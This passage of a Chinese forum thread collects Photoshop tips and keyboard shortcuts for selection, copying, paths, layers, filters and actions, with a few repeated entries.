8、当我们要复制文件中的选择对象时,要使用编辑菜单中的复制命令。如果只复制一次,我们也许会觉察不出麻烦,但如果要重复多次复制,那就需要一次一次的进行多次点击,这样累计起来就相当不便了。那么有没有比较简单的操作方法呢?答案当然是肯定的,这里我们提供了一种快捷的操作方法,其具体步骤如下:首先我们可以先用选择工具选定所要操作的对象,而后再用鼠标单击移动工具,接着再按住键盘上的“Alt”键不放,当光标变成一黑一白重叠在一起的两个箭头时,拖动鼠标到所需位置就可以了,如果我们要进行多次复制操作,可以重复地松放鼠标就行了。

9、使用笔形工具制作路径时,按住Shift键可以强制路径或方向线成水平、垂直成45度角,按住Ctrl键可以暂时切换到路径选取工具,按住Alt键将笔形光标在黑色节点上单击可以改变方向线的方向,使曲线能够转折;按住Alt键用路径选取工具单击路径会选取整个路径;要同时选取多个路径可以按住键盘上的Shift键后逐个单击;用路径选取工具时按住键盘上的Ctrl + Shift复合键移近路径会切换到加节点和减节点笔形工具上。

10、移动图层和选取框时,如果同时按住键盘上的Shift键可以做水平、垂直或45度角的移动,按住键盘上的方向键可以做每次1像素的移动,按住Shift键再同时按住键盘上的方向键可以做每次10像素的移动。

2008/12/13 21:57

sun 于 2005年02月07日 15:03:53
sun 于 2005年02月07日 15:11:12
sun 于 2005年02月07日 15:15:58
应用扩展 工具箱


Re: Photoshop 鲜为人知的75个技巧
新进会员
注册日期:
1970/1/1 8:00
所属群组:
注册会员
帖子: 5
等级: 1; EXP: 34
HP : 0 / 8
MP : 1 / 1279
离线
photoshop八招密技+ photoshop技巧148条

密技一: 当你需要快速隐藏工具栏和多个浮动面板时,逐一点击面板上的关闭按钮,接下来使用时又要打开,十分不方便。其实你可以同时按键盘上的“Shift”和“ Tab”键,这样浮动面板会立即隐藏起来,从屏幕上消失,再同时按下两键,面板又会显现;如果只按下“Tab”键,则工具栏连同浮动面板会一起隐藏,再按以下该键,它们会同时显现。


密技二: 在Photoshop中,有很多时候要修改设置的取值。一般情况会在取值框的又侧有一个黑三角,点击它会出现一个滑动标尺,拖动标尺就可以修改取值了,但有时不会十分精确。这时可以按键盘上的向下箭头键(每按一下表示取值加一)和向上箭头键(每按一下表示取值减一),来准确调整数值。如果按住“Shift”键不放,那么每按一下表示取值加十或减十。


密技三: 当你正在使用画笔工具,要调整不透明度时,还要打开设置框,很麻烦。这时你可以直接按键盘上的数字键来设定。比如当你按一下“ 0”键时,则不透明度为100%。“ 1”键为10%。先按“ 4”再按“ 5”,那么不透明度则为45%,依次类推。


密技四: 当我们要复制文件中的选择对象时,要使用编辑菜单中的复制命令。复制一次你也许觉不出麻烦,但要多次复制,一次一次的点击就相不便了。这时你可以先用选择工具选定对象,而后点击移动工具,在按住“Alt”见不放。当光标变成一黑一白重叠在一起的两个箭头时,拖动鼠标到所需位置即可。若要多次复制,只要重复的放松鼠标就行了。


密技五: 我们需要多层选择时,可以先用选择工具选定文件中的区域,拉制出一个选择虚框;然后按住“Alt”键,当光标变成一个右下角带一小“-”的“+”号时(这表示减少被选择的区域或象素),在第一个框的里面拉出第二个框;而后按住“ Shift”键,当光标变成一个右下角带一小“+”的大“+”号时,再在第二个框的里面拉出第三个选择框,这样二者轮流使用,就可以进行多层选择了。其实用这种方法也可以选择不规则对象,自己去体会吧。


密技六: 当我们编辑图片文件时,有时要去掉选择对象以外的图片颜色,这时可以按键盘上的“Delete”键,选择区以外就会变成背景色或透明的,这要看你设定的背景内容是什么了。


密技七: 去掉扫描图片中的龟纹。由于印刷方面的原因,我们用扫描方式输入电脑的图片会有一些龟纹,如果在此基础上进行处理,会影响以后的效果。这时你可以先用“Noise”滤镜中的“Despeckle”做处理,这时图片会变得稍微模糊;接着用“Sharpen”滤镜中的“Sharpen Edge”(注意设置数值要小一些)再处理一下,就大功告成了,这时即使用放大工具观察也不会出现龟纹了。


密技八: 我们使用Photoshop 一段时间后,文件夹中已经存放了大量的图片和影像文件。当你要调用一个很久不用的文件,并且忘记了它的文件名时,需逐一打开文件夹中的文件来寻找,太麻烦了。我有一简便的方法:Photoshop 的File 菜单下的Automate 中有一个Contact Sheet 命令,它可以给文件夹中的每个文件建立一个小缩图,并存放在一个图象文件中,这样方便了以后的检索和查阅,节省了你我的宝贵时间
工具面板技巧

1. 快速打开文件
双击Photoshop的背景空白处(默认为灰色显示区域)即可打开选择文件的浏览窗口。

2. 随意更换画布颜色
选择油漆桶工具并按住Shift点击画布边缘,即可设置画布底色为当前选择的前景色。如果要还原到默认的颜色,设置前景色为25%灰度(R192,G192,B192)再次按住Shift点击画布边缘。

3. 选择工具的快捷键
可以通过按快捷键来快速选择工具箱中的某一工具,各个工具的字母快捷键如下:
选框-M 移动-V 套索-L 魔棒-W
喷枪-J 画笔-B 铅笔-N 橡皮图章-S
历史记录画笔-Y 橡皮擦-E 模糊-R 减淡-O
钢笔-P 文字-T 度量-U 渐变-G
油漆桶-K 吸管-I 抓手-H 缩放-Z
默认前景和背景色-D 切换前景和背景色-X
编辑模式切换-Q 显示模式切换-F
另外,如果我们按住Alt键后再单击显示的工具图标,或者按住Shift键并重复按字母快捷键则可以循环选择隐藏的工具。

4. 获得精确光标
  按Caps Lock键可以使画笔和磁性工具的光标显示为精确十字线,再按一次可恢复原状。

5. 显示/隐藏控制板
  按Tab键可切换显示或隐藏所有的控制板(包括工具箱),如果按Shift+Tab则工具箱不受影响,只显示或隐藏其他的控制板。

6. 快速恢复默认值
有些不擅长Photoshop的朋友为了调整出满意的效果真是几经周折,结果发现还是原来的默认效果最好,这下傻了眼,后悔不该当初呀!怎么恢复到默认值呀?试着轻轻点按选项栏上的工具图标,然后从上下文菜单中选取“复位工具”或者“复位所有工具”。

7. 自由控制大小
  缩放工具的快捷键为“Z”,此外“Ctrl+空格键”为放大工具,“Alt+空格键”为缩小工具,但是要配合鼠标点击才可以缩放;相同按Ctrl+“+”键以及“-”键分别也可为放大和缩小图像;Ctrl+Alt+“+”和Ctrl+Alt+“-” 可以自动调整窗口以满屏缩放显示,使用此工具你就可以无论图片以多少百份比来显示的情况下都能全屏浏览!如果想要在使用缩放工具时按图片的大小自动调整窗口,可以在缩放工具的属性条中点击“满画布显示”选项。

8. 使用非Hand Tool(手形工具)时,按住空格键后可转换成手形工具,即可移动视窗内图像的可见范围。在手形工具上双击鼠标可以使图像以最适合的窗口大小显示,在缩放工具上双击鼠标可使图像以1:1的比例显示。

9. 在使用Erase Tool(橡皮擦工具)时,按住Alt 键即可将橡皮擦功能切换成恢复到指定的步骤记录状态。

10. 使用Smudge Tool(指尖工具)时,按住Alt键可由纯粹涂抹变成用前景色涂抹。

11. 要移动使用Type Mask Tool(文字蒙版工具)打出的字形选取范围时,可先切换成快速蒙版模式(用快捷键Q切换),然后再进行移动,完成后只要再切换回标准模式即可。

12. 按住Alt键后,使用Rubber Stamp Tool(橡皮图章工具)在任意打开的图像视窗内单击鼠标,即可在该视窗内设定取样位置,但不会改变作用视窗。

13. 在使用Move Tool(移动工具)时,可按键盘上的方向键直接以1 pixel的距离移动图层上的图像,如果先按住Shift键后再按方向键则以每次10 pixel的距离移动图像。 而按Alt键拖动选区将会移动选区的拷贝。

14. 使用磁性套索工具或磁性钢笔工具时,按“[”或“]”键可以实时增加或减少采样宽度(选项调板中)。

15. 度量工具在测量距离上十分便利(特别是在斜线上),你同样可以用它来量角度(就像一只量角器)。在信息面板可视的前提下,选择度量工具点击并拖出一条直线,按住Alt键从第一条线的节点上再拖出第二条直线,这样两条线间的夹角和线的长度都显示在信息面板上。用测量工具拖动可以移动测量线(也可以只单独移动测量线的一个节点),把测量线拖到画布以外就可以把它删除。

16. 使用绘画工具如(如画笔,向笔等),按住Shift键单击鼠标,可将两次单击点以直线连接。

17. 按住Alt键用吸管工具选取颜色即可定义当前背景色。通过结合颜色取样器工具(Shift+I)和信息面板监视当前图片的颜色变化。变化前后的颜色值显示在信息面板上其取样点编号的旁边。通过信息面板上的弹出菜单可以定义取样点的色彩模式。要增加新取样点只需在画布上用颜色取样器工具随便什么地方再点一下,按住Alt键点击可以除去取样点。但一张图上最多只能放置四个颜色取样点。当Photoshop中有对话框(例如:色阶命令、曲线命令等等)弹出时,要增加新的取样点必须按住Shift键再点击,按住Alt+Shift点击可以减去一个取样点。

18. 裁切工具大家都一定用过,这种情况你也一定遇到过;在你调整裁切握、而裁切框又比较接近图像边界的时候,裁减框会自动地贴到图像的边上,令你无法精确的裁切图像。不过只要在调整裁切边框的时候接下“Ctrl”键,那么裁切框就会服服帖帖,让你精确裁切。

复制技巧

19. 按住Ctrl+Alt键拖动鼠标可以复制当前层或选区内容。

20. 如果你最近拷贝了一张图片存在剪贴板里,Photoshop在新建文件(Ctrl+N)的时候会以剪贴板中图片的尺寸作为新建图的默认大小。要略过这个特性而使用上一次的设置,在打开的时候按住Alt键(Ctrl+Alt+N)。

21. 如果创作一幅新作品,需要与一幅已打开的图片有一样的尺寸、解析度、格式的文件。选取“文件”→“New”,点Photoshop菜单栏的Windows选项,在弹出菜单的最下面一栏点击已开启的图片名称,是的,就是这么简单!

22. 在使用自由变换工具(Ctrl+T)时按住Alt键(Ctrl+Alt+T)即可先复制原图层(在当前的选区)后在复制层上进行变换;Ctrl+Shift+T为再次执行上次的变换,Ctrl+Alt+Shift+T为复制原图后再执行变换。

23. 使用“通过复制新建层(Ctrl+J)”或“通过剪切新建层(Ctrl+J)”命令可以在一步之间完成拷贝到粘贴和剪切到粘贴的工作;通过复制(剪切)新建层命令粘贴时仍会放在它们原来的地方,然而通过拷贝(剪切)再粘贴,就会贴到图片(或选区)的中心。

24. 若要直接复制图像而不希望出现命名对话框,可先按住Alt键,再执行“图像”→“副本”命令。

25. Photoshop的剪贴板很好用,但你更希望直接使用Windows系统剪贴板,直接处理从屏幕上截取的图像。好的,按下Ctrl+K,在弹出的面板上将“输出到剪贴板”点中吧!

26. 在Photoshop内实现有规律复制
在做版面设计的时候我们会经常把某些元素有规律地摆放以寻求一种形式的美感,在Photoshop内通过四个快捷键的组合就可以轻易得出。
(1)圈选出你要复制的物体;
(2)按Ctrl+J产生一个浮动 Layer;
(3)按旋转并移动到适当位置后确认;
(4)现在可以按住Ctrl+Alt+Shift 后连续按“T”就可以有规律地复制出连续的物体。(只按住Ctrl+Shift则只是有规律移动)

27. 当我们要复制文件中的选择对象时,要使用编辑菜单中的复制命令。复制一次你也许觉不出麻烦,但要多次复制,一次一次的点击就相当不便了。这时你可以先用选择工具选定对象,而后点击移动工具,再按住“Alt”键不放。当光标变成一黑一白重叠在一起的两个箭头时,拖动鼠标到所需位置即可。若要多次复制,只要重复的放松鼠标就行了。

28. 可以用选框工具或套索工具,把选区从一个文档拖到另一个上。

29. 要为当前历史状态或快照建立一个复制文档可以:
(1)点击“从当前状态创建新文档”按钮;
(2)从历史面板菜单中选择新文档;
(3)拖动当前状态(或快照)到“从当前状态创建新文档”按钮上;
(4)右键点击所要的状态(或快照)从弹出菜单中选择新文档把历史状态中当前图片的某一历史状态拖到另一个图片的窗口可改变目的图片的内容。按住Alt键点击任一历史状态(除了当前的、最近的状态)可以复制它。而后被复制的状态就变为当前(最近的)状态。按住Alt拖动动作中的步骤可以把它复制到另一个动作中。
 

选择技巧

30. 把选择区域或层从一个文档拖向另一个时,按住Shift键可以使其在目的文档上居中。如果源文档和目的文档的大小(尺寸)相同,被拖动的元素会被放置在与源文档位置相同的地方(而不是放在画布的中心)。如果目的文档包含选区,所拖动的元素会被放置在选区的中心。

31. 在动作调板中单击右上角的三角形按钮,从弹出的菜单中选择载入动作,进入PhotoshopGoodiesActions目录下,其下有按钮、规格、命令、图像效果,文字效果、纹理、帧六个动作集,包含了很多实用的东西哟!另外,在该目录下还有一个ACTIONS.PDF文件,可用Adobe Acrobat软件打开,里面详细介绍了这些动作的使用方法和产生的效果。

32. 单击工具条中的画笔类工具,在随后显示的属性条中单击画笔标签右边的小三角,在弹出的菜单中再点击小箭头选择“载入画笔…”。到Photoshop目录的Brushes文件夹中选择*.abr。原来这里还有这么多可爱的东西。

33. 画出一个漂亮的标记,想在作品中重复使用?好办,用套索工具选好它,在Brushes的弹出菜单中选“储存画笔…”,然后用画笔工具选中这个新笔头……朋友,想做居室喷涂吗?

34. 如果想选择两个选择区域之间的部分,在已有的任意一个选择区域的旁边同时按住Shift和Alt键进行拖动,画第二个选择区域(鼠标十字形旁出现一个乘号,表示重合的该区域将被保留)。

35. 在选择区域中删除正方形或圆形,首先增加任意一个选择区域,然后在该选择区域内,按Alt键拖动矩形或椭圆的面罩工具。然后松开Alt键,按住Shift键,拖动到你满意为止。然后先松开鼠标按钮再松开Shift键。

36. 从中心向外删除一个选择区域,在任意一个选择区域内,先按Alt键拖动矩形或椭圆的面罩工具,然后松开Alt键后再一次按住Alt键,最后松开鼠标按钮再松开Alt键。

37. 在快速蒙版模式下要迅速切换蒙版区域或选取区域选项时,先按住Alt键后将光标移到快速遮色片模式图标上单击鼠标就可以了。

38. 使用选框工具的时候,按住Shift键可以划出正方形和正圆的选区;按住Alt键将从起始点为中心勾划选区。

39. 使用“重新选择”命令(Ctrl+Shift+D)来载入/恢复之前的选区。

40. 在使用套索工具勾画选区的时候按Alt键可以在套索工具和多边形套索工具间切换。勾画选区的时候按住空格键可以移动正在勾画的选区。

41. 按住Ctrl键点击层的图标(在层面板上)可载入它的透明通道,再按住Ctrl+Alt+Shift键点击另一层为选取两个层的透明通道相交的区域。

42. 在缩放或复制图片之间先切换到快速蒙板模式[Q]可保留原来的选区。

43. “选择框”工具中Shift和Alt键的使用方法:
当用“选择框”选取图片时,想扩大选择区,这时按住Shift键,光标“+”会变成“十+”,拖动光标,这样就可以再原来选取的基础上扩大你所需的选择区域。或是在同一副图片中同时选取两个或两个 以上的选取框。
当用“选择框”选取图片时,想在“选择框”中减去多余的图片,这时按住“Alt”键,光标“+”会变成“十-”,拖动光标,这样就可以留下你所需要的图片。
当用“选择框”选取图片时,想得到两个选取框叠加的部分,这时按住“Shift+Alt”键,光标“+”会变成“十í”,拖动光标,这样就你想要的部分。
想得到“选取框”中的正圆或正方形时,按住“Shift”键,就可以。

44. “套索”工具中Shift和Alt键的使用方法:
增加选取范围按“Shift”键。(方法和“选择框”中的1相同)
减少选取范围按“Alt”键。(方法和“选择框”中的2相同)
两个选取框叠加的区域按“Shift+Alt”键。(方法和“选择框”中的3相同)

45. “魔杖”工具中Shift和Alt键的使用方法:
增加选取范围按“Shift”键。(方法和“选择框”中的1相同)
减少选取范围按“Alt”键。(方法和“选择框”中的2相同)
两个选取框叠加的区域按“Shift+Alt”键。(方法和“选择框”中的3相同)

快捷键技巧

46. 你可以用以下的快捷键来快速浏览你的图像:
Home卷动至图像的左上角;End卷动至图像的右下角;Page UP卷动至图像的上方;Page Down卷动至图像的下方;Ctrl+Page Up卷动至图像的左方;Ctrl+Page Down卷动至图像的右方。

47. 按Ctrl键+Alt键+0键即可使图像按1:1比例显示。

48. 当你想“紧排”(调整个别字母之间的空位),首先在两个字母之间单击,然后按下Alt键后用左右方向键调整。

49. 将对话框内的设定恢复为默认,先按住Alt键后,Cancel键会变成Reset键,再单击Reset键即可。

50. 要快速改变在对话框中显示的数值,首先用鼠标点击那个数字,让光标处在对话框中,然后就可以用上下方向键来改变该数植了。如果在用方向键改变数值前先按下Shift键,那么数值的改变速度会加快。

51. Photoshop 6.0除了以往熟悉的快捷键Ctrl+Z(可以自由地在历史记录和当前状态中切换)之外,还增加了Shift+Ctrl+Z(用以按照操作次序不断的逐步恢复操作)和Alt+Ctrl+Z(使用户可以按照操作次序不断的逐步取消操作)两个快捷键。按Ctrl+Alt+Z和Ctrl+Shift+Z组合键分别为在历史记录中向后和向前(或者可以使用历史面板中的菜单来使用这些命令)。

52. 填充功能:
Shift+Backspace打开填充对话框;
Alt+Backspace和Ctrl+Backspace组合键分别为填充前景色和背景色;
按Alt+Shift+Backspace及Ctrl+Shift+Backspace组合键在填充前景及背景色的时候只填充已存在的像素(保持透明区域)。

53. 键盘上的D键、X键可迅速切换前景色和背景色。

54. 用任一绘图工具画出直线笔触:先在起点位置单击鼠标,然后按住Shift键,再将光标移到终点单击鼠标即可。

55. 打开Curve(曲线)对话框时,按Alt键后单击曲线框,可使格线更精细,再单击鼠标可恢复原状。

56. 使用矩形(椭圆)选取工具选择范围后,按住鼠标不放,再按空格键即可随意调整选取框的位置,放开后可再调整选取范围的大小。

57. 增加一个由中心向外绘制的矩形或椭圆形,在增加的任意一个选择区域内,先按Shift键拖动矩形或椭圆的面罩工具,然后放开Shift键,然后按Alt键,最后松开鼠标按钮再松开Alt键。按Enter键或Return键可关闭滑块框。若要取消更改,按Escape键 (Esc)。若要在打开弹出式滑块对话框时以10%的增量增加或减少数值,请按住Shift键并按上箭头键或者下箭头键。

58. 若要在屏幕上预览RGB模式图像的CMYK模式色彩时,可先执行“视图”→“新视图”命令,产生一个新视图后,再执行“视图”→“预览”→“CMYK”命令,即可同时观看两种模式的图像,便于比较分析。

59. 按Shift键拖移选框工具限制选框为方形或圆形;按Alt键拖移选框工具从中心开始绘制选框;按Shift+Alt键拖移选框工具则从中心开始绘制方形或圆形选框。

60. 要防止使用裁切工具时选框吸附在图片边框上,在拖动裁切工具选框上的控制点的时候按住Ctrl键即可。

61. 要修正倾斜的图像,先用测量工具在图上可以作为水平或垂直方向基准的地方画一条线(如图像的边框、门框、两眼间的水平线等等),然后从菜单中选“图像”→“旋转画布”→“任意角度…”,打开后会发现正确的旋转角度已经自动填好了,只要按确定就OK啦。

62. 可以用裁切工具来一步完成旋转和剪切的工作:先用裁切工具画一个方框,拖动选框上的控制点来调整选取框的角度和大小,最后按回车实现旋转及剪切。测量工具量出的角度同时也会自动填到数字变换工具(“编辑”→“变换” →“数字” )对话框中。

63. 裁剪图像后所有在裁剪范围之外的像素就都丢失了。要想无损失地裁剪可以用“画布大小”命令来代替。虽然Photoshop会警告你将进行一些剪切,但出于某种原因,事实上并没有将所有“被剪切掉的”数据都被保留在画面以外,但这对索引色模式不起作用。

64. 合并可见图层时按Ctrl+Alt+Shift+E为把所有可见图层复制一份后合并到当前图层。同样可以在合并图层的时候按住Alt键,会把当前层复制一份后合并到前一个层,但是Ctrl+Alt+E这个热键这时并不能起作用。

65. 按Shift+Backspace键可激活“编辑”→“填充”命令对话框,按Alt+Backspace键可将前景色填入选取框;按Ctrl+Backspace键可将背景填八选取框内。

66. 按Shift+Alt+Backspace 键可将前景色填入选取框内并保持透明设置,按Shift+CtrBackspace键可将背景色填入选取框内保持透明设置。

67. 按Alt+Ctrl+Backspace键从历史记录中填充选区或图层,按Shift+Alt+Ctrl+Backspace键从历记录中填充选区或图层并且保持透明设置。

68. 按Ctrl+“=”键可使图像显示持续放大,但窗口不随之缩小;按Ctrl+“-”键可使图像显示持续缩小,但窗口不随之缩小;按Ctrl+Alt+“=”键可使图像显示持续放大,且窗口随之放大;按Ctrl+Alt+“-”键可使图像显示持续缩小,且窗口随之缩小。

69. 移动图层和选区时,按住Shift键可做水平、垂直或45度角的移动;按键盘上的方向键可做每次1个像素的移动;按住Shift键后再按键盘上的方向键可做每次10个像素的移动。

70. 创建参考线时,按Shift键拖移参考线可以将参考线紧贴到标尺刻度处;按Alt键拖移参考线可以将参考线更改为水平或垂直取向。

71. 在“图像”→“调整”→“曲线”命令对话框中,按住Alt键于格线内单击鼠标可以使格线精细或粗糙;按住Shift键并单击控制点可选择多个控制点,按住Ctrl 键并单击某一控制点可将该点删除。

72. 若要将某一图层上的图像拷贝到尺寸不同的另一图像窗口中央位置时,可以在拖动到目的窗口时按住Shift键,则图像拖动到目的窗口后会自动居中。

73. 在使用“编辑”→“自由变换”(Ctrl+T)命令时,按住Ctrl键并拖动某一控制点可以进行自由变形调整;按住Alt键并拖动某一控制点可以进行对称变形调整;按住Shift键并拖动某一控制点可以进行按比例缩放的调整;按住Shift+Ctrl键并拖动某一控制点可以进行透视效果的调整;按Shift+Ctrl键并拖动某一控制点可以进行斜切调整;按Enter键应用变换;按Esc键取消操作。

74. 在色板调板中,按Shift键单击某一颜色块,则用前景色替代该颜色;按Shift+Alt键单击鼠标,则在点击处前景色作为新的颜色块插入;按Alt键在某一颜色块上单击,则将背景色变该颜色;按Ctrl键单击某一颜色块,会将该颜色块删除。

75. 在图层、通道、路径调板上,按Alt键单击这些调板底部的工具按钮时,对于有对话框的工具可调出相应的对话框更改设置。

76. 在图层、通道、路径调板上,按Ctrl键并单击一图层、通道或路径会将其作为选区载入;按Ctrl+Shift键并单击,则添加到当前选区;按Ctrl+Shift+Alt键并单击,则与当前选区交叉。

77. 在图层调板中使用图层蒙板时,按Shift键并单击图层蒙板缩览图,会出现一个红叉,表示禁用当前蒙板,按Alt键并单击图层蒙板缩览图,蒙板会以整幅图像的方式显示,便于观察调整。

78. 在路径调板中,按住Shift键在路径调板的路径栏上单击鼠标可切换路径是否显示。

79. 更改某一对话框的设置后,若要恢复为先前值,要按住alt键、取消按钮会变成复位按钮,在复位按钮上单击即可。

路径技巧

80. 大家在点选调整路径上的一个点后,按“Alt”键,再点击鼠标左键在点上点击一下,这时其中一根“调节线”将会消失,再点击下一个路径点时就会不受影响了。

81. 如果你用“Path”画了一条路径,而鼠标现在的状态又是钢笔的话,你只按下小键盘上的回车键(记住是小键盘上的回车,不是主键盘上的!),那么路径就马上会变为“选取区”了。

82. 如果你用钢笔工具画了一条路径,而你现在鼠标的状态又是钢笔的话,你只要按下小键盘上的回车键(记住是小键盘上的回车,不是主键盘上的!),那么路径就马上就被作为选区载入。

83. 按住Alt键后在路径控制板上的垃圾桶图标上单击鼠标可以直接删除路径。

84. 使用路径其他工具时按住Ctrl键使光标暂时变成方向选取范围工具。

85. 按住Alt键后在路径控制板上的垃圾桶图标上单击鼠标可以直接删除路径。

86. 使用路径其他工具时按住Ctrl键使光标暂时变成方向选取范围工具。

87. 点击路径面板上的空白区域可关闭所有路径的显示。

88. 在点击路径面板下方的几个按钮(用前景色填充路径、用前景色描边路径、将路径作为选区载入)时,按住Alt键可以看见一系列可用的工具或选项。

89. 如果我们需要移动整条或是多条路径,请选择所需移动的路径然后使用快捷键Ctrl+T,就可以拖动路径至任何位置。

90. 在勾勒路径时,我们最常用的操作还是像素的单线条的勾勒,但此时会出现问题,即有矩齿存在,很影响实用价值,此时我们不妨先将其路径转换为选区,然后对选区进行描边处理,同样可以得到原路径的线条,却可以消除矩齿。

91. 将选择区域转换成路径是一个非常实用的操作。此功能与控制面板中的相应图标功能一致。调用此功能时,所需要的属性设置将可在弹出的MAKE WORK PQTH设置窗口中进行。

92. 使用笔形工具制作路径时按住Shift键可以强制路径或方向线成水平、垂直或45度角,按住Ctrl键可暂时切换到路径选取工具,按住Alt键将笔形光标在黑色节点上单击可以改变方向线的方向,使曲线能够转折;按Alt键用路径选取工具单击路径会选取整个路径;要同时选取多个路径可以按住Shift后逐个单击;使用路径选工具时按住“Ctrl+Alt”键移近路径会切换到加节点与减节点笔形工具。

93. 若要切换路径是否显示,可以按住Shift键后在路径调色板的路径栏上单击鼠标, 或者在路径调色版灰色区域单击即可,还可以按Ctrl+Shift+H。 若要在Color调色板上直接切换色彩模式,可先按住Shift键后,再将光标移到色彩条上单击即可。

Actions动作技巧

94. 若要在一个动作中的一条命令后新增一条命令,可以先选中该命令,然后单击调板上的开始记录按钮,选择要增加的命令,再单击停止记录按钮即可。

95. 先按住Ctrl键后,在动作控制板上所要执行的动作的名称上双击鼠标,即可执行整个动作。

96. 若要一起执行数个宏(Action),可以先增加一个宏,然后录制每一个所要执行的宏。

97. 若要在一个宏(Action)中的某一命令后新增一条命令,可以先选中该命令,然后单击调色板上的开始录制图标,选择要增加的命令,再单击停止录制图标即可。

滤镜技巧

98. 滤镜快捷键
Ctrl+F――再次使用刚用过的滤镜。
Ctrl+Alt+F――用新的选项使用刚用过的滤镜。
Ctrl+Shift+F――退去上次用过的滤镜或调整的效果或改变合成的模式。

99. 在滤镜窗口里,按Alt键,Cancel按钮会变成Reset按钮,可恢复初始状况。想要放大在滤镜对话框中图像预览的大小,直接按下“Ctrl”,用鼠标点击预览区域即可放大;反之接下“Alt”键则预览区内的图像便迅速变小。

100. 滤镜菜单的第一行会记录上一条滤镜的使用情况,方便重复执行。

101. 在图层的面板上可对已执行滤镜后的效果调整不透明度和色彩混合等 (操作的对象必须是图层)。

102. 对选取的范围羽化(Feather)一下,能减少突兀的感觉。

103. 在使用“滤镜”→“渲染”→“云彩”的滤镜时,若要产生更多明显的云彩图案,可先按住Alt键后再执行该命令;若要生成低漫射云彩效果,可先按住Shift键后再执行命令。

104. 在使用“滤镜”→“渲染”→“光照效果”的滤镜时,若要在对话框内复制光源时,可先按住Alt键后再拖动光源即可实现复制。

105. 针对所选择的区域进行处理。如果没有选定区域,则对整个图像做处理;如果只选中某一层或某一通道,则只对当前的层或通道起作用。

106. 滤镜的处理效果以像素为单位,就是说相同的参数处理不同分辨率的图像,效果会不同。

107. RGB的模式里可以对图形使用全部的滤镜,文字一定要变成了图形才能用滤镜。

108. 使用新滤镜应先用缺省设置实验,然后试一试较低的配置,再试一试较高的配置。观察以下变化的过程及结果。用一幅较小的图像进行处理,并保存拷贝的原版文件,而不要使用“还原”。这样使操作者对所做的结果进行比较,记下自己真正喜欢的设置。

109. 在选择滤镜之前,先将图像放在一个新建立的层中,然后用滤镜处理该层。这个方法可使操作者把滤镜的作用效果混合到图像中去,或者改变混色模式,从而得到需要的效果。这个方法还可以使操作者在设计的过程中,按自己的想法随时改变图像的滤镜效果。

110. 即使操作者已经用滤镜处理层了,也可以选择“褪色...”该命令。用户使用该命令时只要调节不透明度就可以了,同时还要改变混色模式。在结束该命令之前,操作者可随意用滤镜处理该层。注意,如果使用了“还原”,就不能再更改了。

111. 有些滤镜一次可以处理一个单通道,例如绿色通道,而且可以得到非常有趣的结果。注意,处理灰阶图像时可以使用任何滤镜。

112. 用滤镜对Alpha通道进行数据处理会得到令人兴奋的结果(也可以处理灰阶图像),然后用该通道作为选取,再应用其他滤镜,通过该选取处理整个图像。该项技术尤其适用于晶体折射滤镜。

113. 用户可以打破适当的设置,观察有什么效果发生。当用户不按常规设置滤镜时,有时能得到奇妙的特殊效果。例如,将虚蒙版或灰尘与划痕的参数设置得较高,有时能平滑图像的颜色,效果特别好。

114. 有一种能产生较好特殊效果的技术,即对同(次数不适宜太多)。这项技术对担操作滤镜来说西欧特别好。当然也可以用于其他滤镜。用户还可以用同一种滤镜的不通设置、或者用完全不同的滤镜,多次用于同一选取,看看效果如何。

115. 有些滤镜的效果非常明显,细微的参数调整会导致明显的变化,因此在使用时要仔细选择,以免因为变化幅度过大而失去每个滤镜的风格。处理过渡的图像只能作为样品或范例,但它们不是最好的艺术品,使用滤镜还应根据艺术创作的需要,有选择地进行。

图层技巧

116. 要把当前的选中图层往上移:接下“ctrl +]” 组合键,就可以把当前的图层往上翻一层;按下“ctrl+[” 组合键,就可以把当前的图层往下翻一层。

117. 用鼠标将要复制的图层拖曳到面板上端的“新建”图标上可新建一个图层。

118. 在移动图层或选取范围时,按住Shift键强制做水平、垂直或45°的移动。

119. 在移动图层或选取范围时,按键盘上的方向键做每次1 pixel的移动。

120. 在移动图层或选取范围时,先按住Shift键后再按键盘上的方向键做每次10 pixel的移动。

121. 直接删除图层时可以先按住Alt键后将光标移到图层控制板上的垃圾桶上单击鼠标即可。

122. 按下Ctrl键后,你的移动工具就有自动选择功能了,这时你只要单击某个图层上的对象,那么Photoshop就会自动的切换到那个对象所在的图层;但当你放开Ctrl键,你的移动工具就不在有自动选择的功能呢,这样就很容易防止误选。

123. 不能在层面板中同时拖动多个层到另一个文档(即使它们是链接起来的)――这只会移动所选的层。

124. 要把多个层编排为一个组,最快速的方法是先把它们链接起来,然后选择编组链接图层命令(Ctrl+G)。当要在不同文档间移动多个层时就可以利用移动工具在文档间同时拖动多个层了。用这个技术同样可以用来合并(Ctrl+E)多个可见层( 因为当前层与其它层有链接时“与前一层编组命令”会变成“编组链接图层”命令 )。

125. 在层面板中按住Alt键在两层之间点击可把他们编为一组。当一些层链接在一些而你又只想把它们中的一部分编组时这个功能十分好用。因为编组命令(Ctrl+G)在当前层与其它层有链接时会转为编组链接层命令(Ctrl+G)。

126. 用鼠标双击“图层控制”面板中带“T”字样的图层还可以再次对文字进行编辑。

127. 按住Alt点击所需层前眼睛图标可隐藏/显现其它所有图层。

128. 按住Alt点击当前层前的笔刷图标可解除其与其它所有层的链接。

129. 要清除某个层上所有的层效果,按住Alt键双击该层上的层效果图标。

130. 要关掉其中一个效果,按住Alt键然后在“图层”→“图层样式”子菜单中选中它的名字;或者可以在图层效果对话框中取消它的“应用”标记。

131. 这里有一个节省时间的增加调整层的方法:只需按住Ctrl点击“创建新图层“图标(在层面板的底部)选择你想加的调整层类型!

132. 除了在通道面板中编辑层蒙板以外,按Alt点击层面板上蒙板的图标可以打开它;按住Shift键点击蒙板图标为关闭/打开蒙板(会显示一个红叉X表示关闭蒙板)。按住Alt+Shift点击层蒙板可以以红宝石色(50%红)显示。按住Ctrl键点击蒙板图标为载入它的透明选区。

133. 按层面板上的“添加图层蒙板”图标(在层面板的底部)所加入的蒙板默认显示当前选区的所有内容;按住Alt键点“添加图层蒙板”图标所加的蒙板隐藏当前选区内容。

134. 当前工具为移动工具(或随时按住Ctrl键)时,右键点击画布可以打开当前点所有层的列表(按从上到下排序 ):从列表中选择层的名字可以使其为当前层。

135. 按住Alt键点鼠标右键可以自动选择当前点最靠上的层,或者打开移动工具选项面板中的自动选择图层选项也可实现。

136. Alt+Shift+右键点击可以切换当前层是否与最上面层作链接。

